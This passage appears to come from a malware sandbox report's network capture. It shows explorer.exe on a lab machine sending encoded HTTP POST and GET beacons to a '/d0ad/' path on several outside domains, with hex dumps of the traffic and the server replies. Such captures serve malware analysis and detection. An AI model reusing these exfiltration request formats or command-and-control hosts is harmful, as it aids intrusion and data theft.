76 51 52 6e 39 67 75 4b 50 4b 6b 30 74 30 74 56 4d 6a 62 67 31 65 52 6a 68 6a 54 52 41 76 6b 7a 39 39 28 63 49 35 6b 31 36 38 39 72 7a 44 45 55 4f 50 6d 70 68 68 6a 67 32 58 41 53 48 77 4b 6e 62 51 43 65 37 76 4e 70 28 66 6d 42 45 5f 54 6a 52 6e 30 6d 67 46 55 70 72 5f 34 32 47 72 74 38 74 6e 7a 4b 36 4d 48 36 74 4b 58 6c 28 6d 38 35 4d 52 73 50 41 46 4a 71 61 36 50 63 41 4a 74 44 4b 5a 46 48 43 53 48 77 58 30 56 74 4f 58 73 6f 54 48 7a 58 36 73 72 36 71 69 53 77 72 59 35 44 28 74 38 55 61 41 7a 38 4a 50 34 6a 51 53 74 31 6d 68 38 50 6f 31 61 54 7a 36 70 4a 54 43 50 51 67 53 74 5a 59 6b 41 73 36 43 51 47 36 48 48 72 78 58 58 78 54 4d 34 5f 63 62 68 59 59 36 36 4a 36 48 58 74 49 64 45 7a 6f 34 6b 42 75 33 75 61 35 46 4d 49 7e 4d 47 71 37 73 75 52 48 52 36 47 7a 51 35 68 59 43 76 6c 4e 6b 48 42 42 66 7a 6b 69 36 77 55 6f 5f 64 57 53 72 69 68 61 33 65 72 33 6e 6e 33 30 72 74 53 71 61 46 6b 4f 6a 78 74 43 42 6e 75 7a 56 36 56 4c 45 33 54 7e 66 68 2d 56 46 50 4a 55 55 76 76 33 4e 66 78 4c 64 6d 78 65 41 43 65 58 71 42 37 72 72 68 55 36 7a 65 57 6a 47 28 71 63 6f 4a 72 7e 48 64 48 63 4b 57 32 46 4d 5a 73 51 31 49 35 47 50 5a 30 77 32 54 4d 32 61 30 5f 6b 77 38 5a 70 32 6f 41 50 4d 41 30 68 42 7a 6b 67 38 42 70 28 36 33 63 6d 33 76 51 77 72 43 53 38 57 66 39 70 47 4a 63 38 73 41 33 64 Data Ascii: jXu=~pjsN0Pv3nHLN2VktdK6P81Gt2lCwO34KKPc4ugu(xzJwiZDWUp6kz~FFFVgADkHUuehYiBHkEHLR3m6TvK5mDWBQ74QrYkDFSBae-6049a7JBGXfd26lAOz2KYypqfW9KVFGKfk0zBsjj4ZAZduqDe5onSbdzOED9gQIeP4R0uYE8Cp2z4mSzwE3Pghq5i0geO9RKgx78P1(QHnY2i-rP1Y3CLn~KTMdo4ea98wUcczcvw4n_jiTGQkjygOIrG-UmYCq48TbGZDfhMXhNlDiHZ-ayFdR1C_sYTxLlVAczl5ZMSPD32raiXje0MCeL9NzwBdherAp4523B2J7xU52i~qHL(wjftg8MV856POBjUKHB6gtW9c8cqidD12Ko5NPIwgK97yWg(ge6UEFyzUpJVlelv4ktp7W6dEXzCs5Jvz19iMPpdJZYc5MLDJtflJwbrMh8minufzVlBkMV7ad-~jXKLvTZitB8yPlKDvv3nSINIMUMrj3xb4JseapjlrguecVYmD~p~C8ctKLkTT4Mapb7JEfRMgGahpvMAeiEwO~Ye42-IwIfv8njvmvhUryEPhV3Psc4(vfyCfWPEE4bWU852-3U29JR2OYyyPRhe_KcdfjV2_T8kUoRyRpWUxLy5NqgTdiQoDDD(xi4Hfq2tVxl8wSqVHVq1wUeFcU0JfZE6iLBbg7uAiBIGvNAX2CBm00N6PPcckQoUTzejmohA1pActrqwL7108ERihD_AWkBBPg8dRDDikvFCur2Nq86BBDBeuZ8e2GA(ejiXsyMovXck4JZ~rCqrGmDi4uKJmEm9Dd4Xb1D2fGXorVuPhDILB1OcZ22f3rbDBrhe8uG5V0ODyYutlOLF35a7kNW8KeKMDlcXuKmFFwnvwh0VCJvFMnkuqhLqE35vK1Rm1k9p1XKJKAwvQRn9guKPKk0t0tVMjbg1eRjhjTRAvkz99(cI5k1689rzDEUOPmphhjg2XASHwKnbQCe7vNp(fmBE_TjRn0mgFUpr_42Grt8tnzK6MH6tKXl(m85MRsPAFJqa6PcAJtDKZFHCSHwX0VtOXsoTHzX6sr6qiSwrY5D(t8UaAz8JP4jQSt1mh8Po1aTz6pJTCPQgStZYkAs6CQG6HHrxXXxTM4_cbhYY66J6HXtIdEzo4kBu3ua5FMI~MGq7suRHR6GzQ5hYCvlNkHBBfzki6wUo_dWSriha3er3nn30rtSqaFkOjxtCBnuzV6VLE3T~fh-VFPJUUvv3NfxLdmxeACeXqB7rrhU6zeWjG(qcoJr~HdHcKW2FMZsQ1I5GPZ0w2TM2a0_kw8Zp2oAPMA0hBzkg8Bp(63cm3vQwrCS8Wf9pGJc8sA3dmGaIiWvAFKgfZZuFrl7Q9WS8Ms_leq7eBtKx1HMlGVIqkNoSWiZvin1KQwWBCDl7-(xp7RdRkfAeyyfEeM8vsyJSPPu~PDDUYlsWh60MB4oGt(Qi774ylHJw6x5SKJrejdCqRcrOVDyPLb5KCz-QNAXeeLOjWo4wiEI2jxLcOh1a-kk82y3Q4LtAecrdCDgpPnjCiX3JTbcYIdpja~LdLN-JEiIoPJzHjR0z-svaHcVKP9QYpk1pLFC(j19uQnPUxU-SU49b7nuVAfUP6QYrfOxqH01KgiYBSzSrx5DLSSG6jzL2DzJRHtv1lKQLIDAHT17rd0WDAQLE1WrbY8u~L0u2UYqamtaQ_6FbLs8b9DqTbSX97pyOLc_MlHWr1yAfk98VBSzFt7GvOqPeEeRTWLCoYeIyPuy468SBa28CpGeLV0jnxsKHCEjDDthqsla5-B9TY8YtYm4E3ItKWYV8yVyenqfDsyV5oBWM4OzjjBXVMhfPkrwFULQ(ixLNx(yFdbhoEAdAiRd0ZjMFHKcoGLXoILjiI5u5NVaOBTg4lW32fonGclvedgR0ZA_NbKyB1fnSSj87vSdiCFsogZ-QrOLi0ep5xrV5uo-fCxKPUceNJ2dQI0VXt9pm2C4wYdqAskQgX045lXoFZw4Ju1qM5gTRq2k(kQWw0yGYI8Io6ISy9sM7Sm4TpWCT8GTjWmAihf4EYT42CAJA-bMzCWLSxzI9XNpDkW36winXIC_v0pLte60wpeJyPDoG0IZNofa7Va9m6RGMj~4YTmRRj4csKV6SQtDM99dFZi45nCbae(B6dz3VhiNOjSPFb0loY(KQ_JJLGzEdo35ZCGK~lTAX8PIjEQv4WoJXHlUeD~9wSaz4mNGpDLutqzp1_JGLnweN-xYzwSgeEMwhhep5LLlamocQg16a9DEqVL2Uk6HfrGX5CeUwK6jlqB1nLaJlz9g8vx7CcWGawT2prQC4_9vNlEe(ZoraUYYRJE1ZY1GuJIbPAfjrJW449r80Eu8lbjVhYBxg-KBUZQ82uS6VDy8p10KMjI8JVnAPs3XpL8ie1oK02s81VWchNygEBGhUhSijM0m8x3BrYAckWCJClluro7qdDvMke(ho108qqKUjbMDYF3dLBP0gmlRvRsHxO6xwkgILedLiChQnRyjZ_d8CkY5iwTRDmVhMfQGTIRpTAhVc3v23eezu6vTahNW1KIQNbKxw4NqsBwLRNpeBoz0bYXJg0Vl4uIpi78Y4EyJ(vuXi7VGTWCocmNTcWkTJhuAW7D0pQY9nZWnhZ9Fck~J14kEKqLHo2OBFrOSoLofdx08TX7so2GbaG~-RRd2t61hOpAuwgHAYd7SBjslXbl8VKxuTodCaV4YQ-mfYSC5JTwjna~wAuv71jtNPw5waSoRwRYUfa0N2QBqWHNBVkwwbmyr5eALveeLc7rqOrZlc5y7Mo9qV6HqIQOu0whBUJTpCzpKuvRoQERJXjIrWd41QSh1dxS2j2q5GiKS6_3ljBi-awPxE25nQvTFWe6nLUOsko9P(-Ui4_R5UXRc5ju4yGgZiB8RGiK73pHlFPrzVFMLP41Opo~DomDYADqiZde-wmfjS2TvE4AzZq2uMzb7h84spxuDmKAewCoG6up7eHQonAesNvi_N1adBPPLCSCJcwOtdYlMR51ns9D6ZwlixuQSdUqOW52brkMMAZmQ8Qv-BipDGzrZNbTw2sVkrtMeG8ntSy0XGxoJx49SNDQMShfibfcqVNl1JC4qfZkdQYU0CS4mOf35zIxAI2WnAHRdv7E-I0fHRbzDvowtQ4jJcEFjKQ2shSRS(7TjjbdAm1MdMXlc8FLp08Vq2xaTWAXeEdtWYuyRo0KCNjAmx1aG3FAbN6RxdgaLFVZqzhLMvIFVUeaUqX8OFopXFVu465ejGq7nnm3upe7auC7iRnUUTxjCOYev3PrTuJzc8Ll0xsqpuzOTyS8CTDJ0djAFvrxaHUGxzrlziDbxsmUizC3tiH8-gVg_lVJzEs3r5_PQ8me8wz(ThfEUVAYrOL27JEFICOnDssrxAzrXYQnZ8g2wGSYZ~gKH0foqi1Gb3ftrcU6acYERxySCVW2vd6ph4S7DF7UfmUDDhwEH4JTr4oF22DVPsL~oEg0OnQDHKKTalom1cTi0JTaSs8XqOBC7yWymDbcXyOvwvdWRYXF0nXoXXGt7LK82GeI23QldUqUkidoohogp5nQvMVG4i_syF_D_NveV(e0GbqppVdIFKakpuClJge7tUFOM3NOAupHG~bIEhaBqABPLPwSlBZCdZlqlTB8nR9g_FFUaPJHHBz6XfTAu~WmVOBBkbXwRLhl15NYr1CGzUFmBXxHkspl4sJjo2321Ps~St8bzc1kflzv-yRxEe4RRvKkT9vDZF1m3cqbha8GcPomX4B5xMA752rP4nEBzcPe5iBHx(2(7pYNiCK8SO_7w3Qc8zwoN1lP5SQ6XBK9oV6UubONIFzvcupYzyMbV1vntWMTCEAvwu5g-BQHxqZl_LjV4BFOGeWVGfCTTYHEHD3aNzr5IirMV0pmonyz-enGbl9Se(YVQy9B9DSlfW85zcMmVI61aM28BYwV2hFLUqKH9VDjhb0eK9Br4C906bvE6FM9VjrrYp2C6TuiAet6w38gKBjhzVet9tfwmDW~fXinQqiLwPsUFWGwepOBYQAzxxQogf54liqUl~4fgqW1NLyL2achn
Oct 26, 2022 13:17:30.449708939 CEST	963	OUT	Data Raw: 72 6d 61 62 52 54 57 50 42 38 71 46 4a 63 78 58 53 31 71 35 59 6f 6c 7a 43 59 4e 6a 6c 36 66 34 66 51 44 30 33 5a 5a 72 51 6a 54 51 71 4d 6a 4c 62 65 52 6f 43 31 4a 57 6b 63 65 5f 52 56 50 43 79 45 31 52 42 71 38 41 46 5f 70 49 35 35 66 5f 78 41 Data Ascii: rmabRTWPB8qFJcxXS1q5YolzCYNjl6f4fQD03ZZrQjTQqMjLbeRoC1JWkce_RVPCyE1RBq8AF_pI55f_xAXoDqE_ErR_q0UiufvSj9ZLGC~JsD1Sq9Dk9mIzdVmbaE9lEIaP3RVhHLfi19YkOcclr9Dk366QB9kl6JdPEIfawAJcLbBfO0rqtLJ12_3bmeLvhDLCyqy_9CeuXJUHjAIEaS~K3NE7mQZtJOS3ZdwHeGM8KbnUV0f
Oct 26, 2022 13:17:30.461090088 CEST	964	OUT	Data Raw: 66 74 6e 4b 4a 46 79 4f 55 31 73 69 7a 38 6f 5f 6a 37 6f 2d 33 58 30 62 72 6c 42 56 51 37 6b 34 55 6b 6d 43 76 6c 57 76 6e 63 79 64 32 62 37 6e 71 4f 5a 52 28 62 61 58 67 4d 4e 31 66 56 7a 77 67 39 32 34 4c 36 36 44 59 67 72 76 64 52 74 78 71 54 Data Ascii: ftnKJFyOU1siz8o_j7o-3X0brlBVQ7k4UkmCvlWvncyd2b7nqOZR(baXgMN1fVzwg924L66DYgrvdRtxqT8wW5on(UwTpcSuN6QD1W(ytS14YbW8SyUXBjb8pFhRZSGILb25uk0vzVinTVyaefCOsPvGAp1vblxx0AfdMIUfmPKmDws0FXcH8n(BdJdfdi5Rg9YAxK3GlKGj6n2BG8hZs5clw1qeFP50aEM2vCjzqfj4ZMVLcQS
Oct 26, 2022 13:17:30.461146116 CEST	967	OUT	Data Raw: 6d 69 53 65 34 36 30 31 57 4c 69 63 79 41 43 74 62 45 54 6a 59 77 49 6a 4b 78 7e 55 4b 5a 44 71 41 58 37 4e 36 4e 76 71 52 5a 6b 6f 34 54 76 6a 72 54 35 58 41 47 64 4c 56 51 4d 48 6a 69 6c 4a 74 43 53 65 4f 6c 4c 47 61 61 67 32 4e 33 61 4a 46 45 Data Ascii: miSe4601WLicyACtbETjYwIjKx~UKZDqAX7N6NvqRZko4TvjrT5XAGdLVQMHjilJtCSeOlLGaag2N3aJFEMPJatn0ZqF3GJHFsv2TVRiFZMkUo6mXkaCmpDh3tu2xXMGXsaK9n9rlG~hTdYlIG04TXJQxe1y0pplFeaorr2Bs4fJuYm3P6iHdp5_tHs0h1DCUykADAvGlsG0PPloADxJY9guIRBSa-(wWS3oeE9xTvqtd9hBVif
Oct 26, 2022 13:17:30.461213112 CEST	968	OUT	Data Raw: 63 74 72 50 73 59 65 34 28 4a 59 73 67 4b 31 51 35 54 67 59 7e 51 73 4d 6c 34 6f 6a 6f 6e 44 72 39 73 7e 41 51 61 48 65 65 32 66 43 54 4d 6c 47 72 33 4d 50 37 32 78 46 77 66 5a 52 78 42 4c 46 51 34 54 5f 57 4e 36 34 4c 2d 76 39 5a 75 79 31 76 4d Data Ascii: ctrPsYe4(JYsgK1Q5TgY~QsMl4ojonDr9s~AQaHee2fCTMlGr3MP72xFwfZRxBLFQ4T_WN64L-v9Zuy1vMorC2uBSTyOnM4ymmlipK4mGIyrIsJBknyiCY(-HF25wPN0vwbbKZP071he857huJ4jmmVFpY9qTtd1Oo~C98t6CqwbOWZ-Ixds(PAB~UYYVnXBPzXX8DEZ(2Mp5y5hIb8BSeQ0rskGvTYj4NJdfvyQ8_(2ryoGPQ~
Oct 26, 2022 13:17:30.461386919 CEST	972	OUT	Data Raw: 36 4d 4d 63 33 77 28 73 5a 4f 6d 30 53 56 53 30 64 4b 6c 32 4f 74 50 53 59 46 28 5a 68 51 39 6d 76 51 49 79 7e 4d 7e 46 35 54 63 38 6e 42 52 76 4b 56 72 6c 66 44 75 41 49 34 63 45 68 48 6a 65 46 48 34 5a 4d 57 35 5a 6d 70 76 51 67 32 46 69 68 42 Data Ascii: 6MMc3w(sZOm0SVS0dKl2OtPSYF(ZhQ9mvQIy~M~F5Tc8nBRvKVrlfDuAI4cEhHjeFH4ZMW5ZmpvQg2FihBTzW8v4zZWpYu0WCWRRMFgByuh0nc6A(-NR8SvKAh(3rf~t9Pvv5LBL~4Cn5A2j~3ww(q7CXU~ca5M5RQ4UDltduIq7c0I2Dm1S00Q8FlHjS2rWuF75u9Pbn3pCr_YfIZr4W6TCiimEBY7QZTMCumU18Z6uG0cL38r
Oct 26, 2022 13:17:30.461472034 CEST	973	OUT	Data Raw: 48 63 59 68 37 41 67 4e 76 44 66 41 7e 31 5a 42 73 4b 4a 7a 46 6d 61 4b 35 33 69 4a 36 63 4c 37 36 7a 48 4e 39 69 6c 59 33 6e 7a 6b 50 33 44 77 4c 6e 6b 56 7e 4b 46 6f 45 55 37 7a 54 58 76 32 75 31 6a 65 33 4e 47 66 32 6e 6c 58 4d 77 46 32 76 6c Data Ascii: HcYh7AgNvDfA~1ZBsKJzFmaK53iJ6cL76zHN9ilY3nzkP3DwLnkV~KFoEU7zTXv2u1je3NGf2nlXMwF2vlMmYeZp(W2guGArVT0fb25aKDPEi9oJw8qgZUlEjrGPKOCsiU45Lomil7CZS99l2L7R9zWGGnPWq0Bw7FkPa5MyhDMmufk4FcNrk-WM3_MXDKrNGLjUm-p2glShFmyKEEzMTXL7WTYPvKYOnWbiYAQhdEouVEw1gqP
Oct 26, 2022 13:17:30.461663961 CEST	981	OUT	Data Raw: 4b 56 4d 4c 35 4c 35 36 4f 4d 6d 7a 4b 5f 39 49 53 38 39 2d 31 62 75 6f 6a 56 78 5a 74 61 65 79 63 4f 53 76 72 34 64 6b 56 38 43 49 78 63 31 4b 48 5f 62 56 65 7a 56 4b 47 64 6f 34 56 41 43 46 4e 34 59 6a 4f 4d 54 39 5a 33 78 62 28 54 43 4c 39 48 Data Ascii: KVML5L56OMmzK_9IS89-1buojVxZtaeycOSvr4dkV8CIxc1KH_bVezVKGdo4VACFN4YjOMT9Z3xb(TCL9Hm4w-d5ww(Q3_nXOuA1ccDlCYQoOjZjQuIq89NEsZHT2PQcW_m6UGwth3rCKdkEg8sWczFLpbL0rKyKf9KSHWtHVrH9CIu-7UYUowje2UM_Tq09K-aDdaBimURC5fAaYeZQKWsDZaHb437TjNROagX3HCE41yt0WWu
Oct 26, 2022 13:17:30.461791039 CEST	981	IN	HTTP/1.1 410 Gone Server: openresty Date: Wed, 26 Oct 2022 11:17:30 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close Data Raw: 37 0d 0a 3c 68 74 6d 6c 3e 0a 0d 0a 39 0d 0a 20 20 3c 68 65 61 64 3e 0a 0d 0a 34 65 0d 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 27 72 65 66 72 65 73 68 27 20 63 6f 6e 74 65 6e 74 3d 27 30 3b 20 75 72 6c 3d 68 74 74 70 3a 2f 2f 77 77 77 2e 67 75 76 6e 6f 72 73 6e 79 63 2e 63 6f 6d 2f 27 20 2f 3e 0a 0d 0a 61 0d 0a 20 20 3c 2f 68 65 61 64 3e 0a 0d 0a 38 0d 0a 3c 2f 68 74 6d 6c 3e 0a 0d 0a 30 0d 0a 0d 0a Data Ascii: 7<html>9 <head>4e <meta http-equiv='refresh' content='0; url=http://www.guvnorsnyc.com/' />a </head>8</html>0
Oct 26, 2022 13:17:30.461821079 CEST	986	OUT	Data Raw: 73 54 4a 58 69 4e 56 38 55 61 5a 70 7e 39 49 6a 6d 77 51 2d 31 32 56 6b 78 32 74 65 42 50 4b 7a 45 76 32 51 77 45 78 55 50 69 52 70 49 55 31 44 58 4f 45 33 37 58 69 68 46 47 75 35 48 73 5a 5f 77 75 57 2d 4e 41 79 62 4f 4e 57 64 75 76 45 67 6b 6f Data Ascii: sTJXiNV8UaZp~9IjmwQ-12Vkx2teBPKzEv2QwExUPiRpIU1DXOE37XihFGu5HsZ_wuW-NAybONWduvEgkoSnKeg-CxIPlQmXx3ZjRM~Eeco6NMK46Ah8RHLhQXQyBNrVmrDVHpKdoO6bN6edQ3O4snn1q4R7H5T0isEinHZkWypte3CkPMCemC(GZAqkIlodzH2q0peJAJ3FNVSdTvMaSIzSjUmG82z2tbrHPUJfe_pQqKzMx4~
Oct 26, 2022 13:17:30.462034941 CEST	988	OUT	Data Raw: 79 58 46 73 67 66 68 64 6f 62 33 66 35 38 51 79 6a 43 64 4b 28 75 39 75 28 59 57 5f 52 76 6b 77 75 6d 6a 31 5a 5f 51 5f 68 5a 32 50 76 4b 48 75 76 43 6b 4a 47 6a 61 54 50 42 7e 4a 33 30 50 77 74 6b 39 76 36 4c 63 54 62 33 69 79 39 6a 4a 62 51 55 Data Ascii: yXFsgfhdob3f58QyjCdK(u9u(YW_Rvkwumj1Z_Q_hZ2PvKHuvCkJGjaTPB~J30Pwtk9v6LcTb3iy9jJbQUnl4L85XQWE0NGNmTs1UcnTQIF0KzcYQ-qCmD2Z3-hGJ8HEt9e24pK3MoG6dFWRgVJT6qOAA-n3NdBqpRLfdTVXsiM6E8foyHBX2bmymrwXE9(-Wi~z8SBs7wa11z~lz-nKg8kXE-Qt6Gm6Ek9MVZZ-k0w7Cp0GW1H
Oct 26, 2022 13:17:30.462152958 CEST	989	OUT	Data Raw: 6c 4c 51 31 30 71 67 6b 49 72 33 31 31 6e 79 46 78 6f 57 68 62 72 5a 33 50 6b 4f 78 57 46 48 42 49 74 59 5f 6c 77 73 33 50 2d 43 59 31 4c 7a 4c 72 42 71 48 75 49 76 46 58 45 36 65 59 59 42 76 42 59 33 51 71 66 67 4f 4c 65 78 52 69 34 67 50 79 73 Data Ascii: lLQ10qgkIr311nyFxoWhbrZ3PkOxWFHBItY_lws3P-CY1LzLrBqHuIvFXE6eYYBvBY3QqfgOLexRi4gPysoE9Lm2wQSKIHFaAAjFV3uBGm5LwyOlxrztxmHFW6H5wQo_t03oAi3qeVXYGWl1npy5HDPqo71O9ND1M8vBzpbf6VxgMSaj(Wc3h76iG56xwvpZStwP2_qfB9AZThFahmvmx_I-688jeOPSLASO1TJwgRry6CNrA10

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
37	192.168.11.20	49881	3.64.163.50	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Oct 26, 2022 13:17:32.487482071 CEST	1004	OUT	GET /d0ad/?jXu=zrLMOBLzw3r4M3Z/yuOODvZ2qFQg4fDKObavmOYF/mbdwyJReU8Eih7YSll5LHsPS7aScgEYlXeSWE+YT/OxrgX5e4N2j5d5AQ==&-ZeDxH=1bfDxheXLTWtxB0 HTTP/1.1 Host: www.guvnorsnyc.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Oct 26, 2022 13:17:32.498060942 CEST	1004	IN	HTTP/1.1 410 Gone Server: openresty Date: Wed, 26 Oct 2022 11:17:32 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close Data Raw: 37 0d 0a 3c 68 74 6d 6c 3e 0a 0d 0a 39 0d 0a 20 20 3c 68 65 61 64 3e 0a 0d 0a 34 65 0d 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 27 72 65 66 72 65 73 68 27 20 63 6f 6e 74 65 6e 74 3d 27 30 3b 20 75 72 6c 3d 68 74 74 70 3a 2f 2f 77 77 77 2e 67 75 76 6e 6f 72 73 6e 79 63 2e 63 6f 6d 2f 27 20 2f 3e 0a 0d 0a 61 0d 0a 20 20 3c 2f 68 65 61 64 3e 0a 0d 0a 38 0d 0a 3c 2f 68 74 6d 6c 3e 0a 0d 0a 30 0d 0a 0d 0a Data Ascii: 7<html>9 <head>4e <meta http-equiv='refresh' content='0; url=http://www.guvnorsnyc.com/' />a </head>8</html>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
38	192.168.11.20	49882	188.114.96.3	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Oct 26, 2022 13:17:37.544940948 CEST	1006	OUT	POST /d0ad/ HTTP/1.1 Host: www.pnpg.hair Connection: close Content-Length: 185 Cache-Control: no-cache Origin: http://www.pnpg.hair User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://www.pnpg.hair/d0ad/ Accept-Language: en-US Accept-Encoding: gzip, deflate Data Raw: 6a 58 75 3d 42 52 56 62 66 42 70 77 78 75 51 56 68 2d 4a 57 4d 73 34 49 47 2d 76 37 38 57 7a 68 58 75 56 58 32 55 4c 6a 7e 36 33 79 74 78 72 39 70 46 4d 6d 47 75 55 56 6f 57 52 54 71 53 4a 72 69 74 49 66 49 52 67 48 6f 73 4d 6e 30 36 69 34 6f 6a 6d 70 64 39 36 4f 6e 34 74 71 69 6e 76 70 75 34 49 43 4c 65 57 6f 67 30 5a 43 75 55 4f 64 63 4a 6e 62 31 43 7a 45 48 5f 73 43 71 77 73 5a 67 34 6a 37 56 77 79 62 4f 50 75 4c 5a 78 36 78 71 56 43 7a 4e 4b 72 79 48 71 34 76 71 69 43 4f 65 42 31 6b 53 61 37 68 55 52 57 78 74 39 35 59 73 57 4f 57 36 77 29 2e 00 00 00 00 00 00 00 00 Data Ascii: jXu=BRVbfBpwxuQVh-JWMs4IG-v78WzhXuVX2ULj~63ytxr9pFMmGuUVoWRTqSJritIfIRgHosMn06i4ojmpd96On4tqinvpu4ICLeWog0ZCuUOdcJnb1CzEH_sCqwsZg4j7VwybOPuLZx6xqVCzNKryHq4vqiCOeB1kSa7hURWxt95YsWOW6w).
Oct 26, 2022 13:17:37.750523090 CEST	1007	IN	HTTP/1.1 200 OK Date: Wed, 26 Oct 2022 11:17:37 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close X-Powered-By: PHP/7.2.24 Cache-Control: no-store, no-cache, must-revalidate, max-age=0, post-check=0, pre-check=0 Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=c6WBf6CWGO1cnrfoRB%2BBoLGEa1goQ%2FQNOqLdT8oHwI6CITEHMj6PZcIs3R0c6amIIuXWz8Xdfsu30KQfK6lF%2FZ0xeY14zLRR1wgN9DbGzK6qPWQhX9XX56psERWQ7wFw"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 7602c95dbebf912a-FRA Content-Encoding: gzip alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400 Data Raw: 36 30 36 0d 0a 1f 8b 08 00 00 00 00 00 00 03 a4 58 5b 8f eb b6 11 7e 3f c0 f9 0f ac 83 26 7b 8a 91 2c f9 7e 64 7b 9b a2 49 d0 3e b5 68 fb d2 a7 80 12 47 12 b3 bc 2d 49 f9 d2 c5 fe f7 80 b2 94 63 af b5 de 3d a9 0d 98 12 39 1c ce 7c f3 cd 90 f4 c7 0f 9b 3f fc f0 8f bf fe e7 bf ff fc 91 d4 5e 8a fb 8f 1f 36 5d 1b 9e 90 b2 fb 8f 1f 08 21 64 e3 b9 17 78 bf df ef 63 a3 4c 15 d7 94 5b c2 1d a1 a4 68 9c d7 92 b8 5a 5b 4f 98 96 94 ab cd f8 24 dd 4d 95 e8 29 51 54 e2 76 b4 e3 b8 37 da fa 11 29 b4 f2 a8 fc 76 b4 e7 cc d7 5b 86 3b 5e 60 d4 be 00 e1 8a 7b 4e 45 e4 0a 2a 70 9b 8e c8 b8 d7 25 b8 7a 20 16 c5 76 64 2c 16 5a 29 2c fc 88 d4 16 cb ed a8 f6 de b8 6c 3c 2e b5 f2 2e ae 9c a7 9e 17 71 a1 e5 e8 62 f6 a0 b0 d6 95 40 6a b8 0b f2 e3 c2 b9 c9 9f 4b 2a b9 38 6e ff c6 15 cb f6 55 ed bf 9f 25 c9 7a 9e 24 df 32 ee 8c a0 c7 ad db 53 33 3a 19 e3 fc 51 a0 ab 11 fd 6f 6b b5 5d c4 1f 0d 6e 47 1e 0f 3e 28 ed 07 fb 4f 80 1a 72 cd 8e c0 f8 0e 9c a1 0a a8 31 02 3d e8 fc 17 2c 3c f0 d2 52 89 50 a7 50 4f a0 9e 42 3d 83 7a 0e f5 02 0c e4 42 17 0f 8f 8d f6 08 c6 22 50 a0 79 6e 81 16 56 ab a3 04 ca 98 45 e7 20 e7 15 14 dc 23 14 9a 21 30 14 c0 4a 05 28 81 cb 0a b8 72 f0 90 33 78 04 07 8e 4a 03 4e 52 21 c0 79 cb 1f 30 34 5a 55 e0 9a 1c 5c 63 c0 7b d8 51 0b 39 34 c0 a1 40 e5 d1 02 13 c0 3c 30 06 5a 40 23 40 70 28 39 0a e6 d0 43 a9 ad 04 41 73 14 20 b0 42 c5 c0 d3 5c 20 14 d4 78 ae 15 f8 d6 6d 5f 6a ed c1 07 a2 81 b7 e0 6b f0 0c a8 f5 bc 10 08 d4 71 16 26 a8 1d 75 c0 d0 53 2e 1c a0 cc 91 41 c9 ab c6 62 68 7a 7d 41 11 5a 08 9a 42 53 59 dd 18 90 a8 1a 50 74 07 ba f1 a6 f1 60 9b fc 08 0e 8b 76 86 6b a4 a4 f6 08 9e 4b Data Ascii: 606X[~?&{,~d{I>hG-Ic=9\|?^6]!dxcL[hZ[O$M)QTv7)v[;^`{NEp%z vd,Z),l<..qb@jK8nU%z$2S3:Qok]nG>(Or1=,<RPPOB=zB"PynVE #!0J(r3xJNR!y04ZU\c{Q94@<0Z@#@p(9CAs B\ xm_jkq&uS.Abhz}AZBSYPt`vkK
Oct 26, 2022 13:17:37.750691891 CEST	1008	IN	Data Raw: 04 49 ed 03 d0 86 71 0d 3b ce 50 3f 49 6a 2b ae b2 64 6d 28 63 5c 55 59 b2 ce b5 65 68 b3 64 1d 38 13 39 fe 3f cc d2 24 f9 63 fb 9a 71 55 a3 e5 7e bd c3 60 3d 15 11 15 bc 52 59 4e 1d 0a ae f0 f9 d2 a9 de 9b 73 07 3a 97 6e fa d1 d9 fe d4 51 30 6b Data Ascii: Iq;P?Ij+dm(c\UYehd89?$cqU~`=RYNs:nQ0kI\|D5YIp8@c-+ey<u<u}luq~:ZjfCb-ZX/RO2E!>4fj@GYR*]:1 i~^~Nw{ >Z;c`(bXF
Oct 26, 2022 13:17:37.750813961 CEST	1008	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
39	192.168.11.20	49883	188.114.96.3	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Oct 26, 2022 13:17:39.584585905 CEST	1009	OUT	POST /d0ad/ HTTP/1.1 Host: www.pnpg.hair Connection: close Content-Length: 525 Cache-Control: no-cache Origin: http://www.pnpg.hair User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://www.pnpg.hair/d0ad/ Accept-Language: en-US Accept-Encoding: gzip, deflate Data Raw: 6a 58 75 3d 42 52 56 62 66 42 70 77 78 75 51 56 68 66 5a 57 4b 37 4d 49 57 75 75 4a 69 6d 7a 68 5a 2d 56 54 32 55 48 6a 7e 2d 6e 69 75 44 50 39 70 67 77 6d 46 76 55 56 70 57 52 54 6c 79 4a 75 76 4e 49 55 49 52 73 31 6f 74 67 6e 30 36 47 34 35 46 53 70 4b 39 36 42 6f 59 74 31 6c 6e 76 30 35 6f 49 59 4c 65 61 65 67 31 4e 43 76 67 7e 64 64 4c 28 62 77 51 62 46 4e 5f 73 2d 73 77 73 47 72 59 6a 50 56 77 33 6b 4f 4f 58 32 65 48 79 78 71 78 4f 7a 4f 4b 72 39 4e 61 34 6f 31 79 43 41 57 6a 77 56 54 70 53 53 44 30 4f 54 30 50 42 50 35 33 44 4b 67 47 72 62 69 51 4e 52 41 5a 7a 62 6b 4d 6e 6a 4b 56 5a 72 39 59 47 64 31 